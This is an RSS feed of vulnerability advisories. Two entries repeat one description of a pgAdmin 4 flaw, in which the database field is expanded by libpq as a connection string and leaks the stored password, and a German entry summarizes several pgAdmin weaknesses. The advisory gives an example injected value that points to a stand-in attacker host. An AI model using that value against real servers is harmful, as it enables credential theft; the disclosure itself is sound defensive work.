<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 18:26:34 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-370777</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-370777</link>
      <description>EUVD-2026-370777</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-370777</guid>
    </item>
    <item>
      <title>fkie_cve-2026-86862</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-86862</link>
      <description>&lt;p&gt;pgAdmin 4&amp;#39;s Restore and Maintenance tools passed the client-supplied &amp;#39;database&amp;#39; field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as &amp;#39;host=attacker.example port=5432 dbname=x&amp;#39; therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.&lt;/p&gt;
&lt;p&gt;The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.&lt;/p&gt;
&lt;p&gt;The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection str…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;pgAdmin 4&amp;#39;s Restore and Maintenance tools passed the client-supplied &amp;#39;database&amp;#39; field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as &amp;#39;host=attacker.example port=5432 dbname=x&amp;#39; therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.&lt;/p&gt;
&lt;p&gt;The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.&lt;/p&gt;
&lt;p&gt;The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection str…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-86862</guid>
    </item>
    <item>
      <title>GHSA-wvg3-mxwp-6pg5</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-wvg3-mxwp-6pg5</link>
      <description>&lt;p&gt;pgAdmin 4&amp;#39;s Restore and Maintenance tools passed the client-supplied &amp;#39;database&amp;#39; field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as &amp;#39;host=attacker.example port=5432 dbname=x&amp;#39; therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.&lt;/p&gt;
&lt;p&gt;The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.&lt;/p&gt;
&lt;p&gt;The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection str…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;pgAdmin 4&amp;#39;s Restore and Maintenance tools passed the client-supplied &amp;#39;database&amp;#39; field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as &amp;#39;host=attacker.example port=5432 dbname=x&amp;#39; therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.&lt;/p&gt;
&lt;p&gt;The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.&lt;/p&gt;
&lt;p&gt;The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection str…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-wvg3-mxwp-6pg5</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-3446 — pgAdmin: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-3446</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in pgAdmin ausnutzen, um Dateien zu manipulieren, erweiterte Berechtigungen zu erlangen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszulösen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in pgAdmin ausnutzen, um Dateien zu manipulieren, erweiterte Berechtigungen zu erlangen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszulösen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-3446</guid>
    </item>
  </channel>
</rss>
